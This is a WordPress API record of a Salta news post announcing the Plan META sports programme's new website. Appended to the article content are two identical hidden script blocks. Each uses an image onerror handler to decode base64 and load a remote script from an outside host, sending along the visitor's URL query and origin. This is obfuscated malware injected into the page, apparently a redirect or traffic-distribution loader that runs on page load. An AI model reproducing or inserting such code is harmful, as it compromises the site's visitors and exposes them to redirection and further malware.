{"id":5371,"date":"2025-07-25T09:07:46","date_gmt":"2025-07-25T12:07:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5371"},"modified":"2025-08-13T23:22:22","modified_gmt":"2025-08-14T02:22:22","slug":"el-plan-meta-ya-cuenta-con-su-sitio-web-oficial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5371","title":{"rendered":"El Plan META ya cuenta con su sitio web oficial"},"content":{"rendered":"\n<p><strong><em>El Ministerio de Turismo y Deportes lanz\u00f3 el sitio web del Plan META, una plataforma digital que centraliza informaci\u00f3n, convocatorias e inscripciones de uno de los programas deportivos m\u00e1s importantes de la Provincia, con el objetivo de facilitar el acceso y promover una gesti\u00f3n m\u00e1s inclusiva y federal.<\/em><\/strong><\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes informa el lanzamiento oficial del sitio web del Plan META, una herramienta digital pensada para brindar informaci\u00f3n clara, accesible y actualizada sobre uno de los programas deportivos m\u00e1s ambiciosos de la gesti\u00f3n provincial.<\/p>\n\n\n\n<p>Disponible en&nbsp;<a href=\"http:\/\/www.meta.gob.ar\/\">http:\/\/www.meta.gob.ar<\/a>, la nueva plataforma re\u00fane los principales ejes de acci\u00f3n del Plan META (Clubes, Infraestructura, M\u00e9rito Deportivo y Competencias), promovido por el gobernador Gustavo S\u00e1enz con el objetivo de democratizar el acceso al deporte, fortalecer la infraestructura y acompa\u00f1ar el desarrollo de talentos deportivos en toda la provincia.<\/p>\n\n\n\n<p>En la web, los beneficiarios podr\u00e1n acceder a informaci\u00f3n detallada sobre l\u00edneas de acci\u00f3n, convocatorias abiertas y planillas de inscripci\u00f3n con requisitos para el acceso a los diferentes programas incluidos en el Plan.&nbsp;<\/p>\n\n\n\n<p>\u201cCon esta herramienta digital seguimos avanzando en una gesti\u00f3n accesible y cercana, que apuesta al deporte como motor de inclusi\u00f3n, desarrollo y generador oportunidades para miles de salte\u00f1os y salte\u00f1as\u201d, destac\u00f3 la ministra de Turismo y Deportes,&nbsp;<strong>Manuela Arancibia<\/strong>.<\/p>\n\n\n\n<p>El sitio fue dise\u00f1ado para facilitar el acceso de los beneficiarios a toda la informaci\u00f3n relevante y permitir la inscripci\u00f3n directa a los programas y ejes del plan, garantizando as\u00ed una gesti\u00f3n m\u00e1s cercana, \u00e1gil y federal.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo y Deportes lanz\u00f3 el sitio web del Plan META, una plataforma digital que centraliza informaci\u00f3n, convocatorias e inscripciones de uno de los programas deportivos m\u00e1s importantes de la Provincia, con el objetivo de facilitar el acceso y promover una gesti\u00f3n m\u00e1s inclusiva y federal. El Ministerio de Turismo y Deportes informa [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5372,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[32],"tags":[],"class_list":{"0":"post-5371","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ciencia-y-tecnologia"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5371"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5371"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5371\/revisions"}],"predecessor-version":[{"id":6429,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5371\/revisions\/6429"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5372"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5371"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}